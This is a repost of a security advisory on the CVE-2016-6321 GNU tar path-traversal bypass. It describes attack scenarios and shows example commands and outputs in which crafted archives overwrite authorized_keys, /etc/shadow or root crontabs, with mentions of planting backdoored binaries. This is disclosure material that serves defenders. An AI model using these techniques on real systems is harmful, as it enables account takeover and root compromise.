Site original : shaarli-Links

⇐ retour index

Full Disclosure: [CSS] POINTYFEATHER / tar extract pathname bypass (CVE-2016-6321)

jeudi 27 octobre 2016 à 19:21

Here is a number of practical attack scenarios:

- Attack the user by replacing important files, such as
 .ssh/authorized_keys, .bashrc, .bash_logout, .profile,
 .subversion or .anyconnect, when they extract an tar archive.
  For example:

 user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
 --wildcards 'blurf*'
 tar: Removing leading `blurf/../' from member names
 user@host:~$ cat .ssh/authorized_keys
 ssh-rsa AAAAB3...nU= mrrobot@fsociety

- Attack automation that extracts tar originating from a web
 application or similar sources. Such operation might be performed by
 a setuid root component of the application. The command executed
 could be for example:

 #tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

 The attacker can overwrite /var/spool/cron/crontabs/root to gain code
 execution as root. It is also possible to replace binaries commonly
 executed by root with a backdoored ones, or to drop setuid root
 binaries that will enable the attacker to gain root privileges at
 will. Common attack would be to replace some network facing daemon
 with backdoored one, enabling covert code execution on demand.

 This type of scenario has been successfully exploited in the real
 world to gain a remote code execution as root in different

- Attack commands that try to replace single files/dirs as root:

 The victim would like to replace `/etc/motd' file in the system by
 extracting it from an archive obtained from an untrusted source:

 # tar -C / -xvf archive.tar etc/motd
 tar: Removing leading `etc/motd/../' from member names

 The attacker can also bypass --exclude rule, if it is being used
 with --anchored switch. For example: The victim would like to extract
 all files but `/etc/shadow' from an archive:

 # tar -C / -xvf archive.tar --anchored --exclude etc/shadow
 tar: Removing leading `etc/motd/../' from member names

 In both cases, the attacker has now successfully replaced /etc/shadow
 file with arbitrary content.

Exploiting the vulnerability works best if the attacker has some prior knowledge of the specifics of the tar command line that gets executed. The path prefix before the `..' sequence will need to (at least partially) match the target path (or not match in case of the exclude rule) in order for the bypass attack to work. Guessing which paths the victim might extract could work too, but the success rate is likely lower.

Vulnerable versions

- GNU tar 1.14 to 1.29 (inclusive)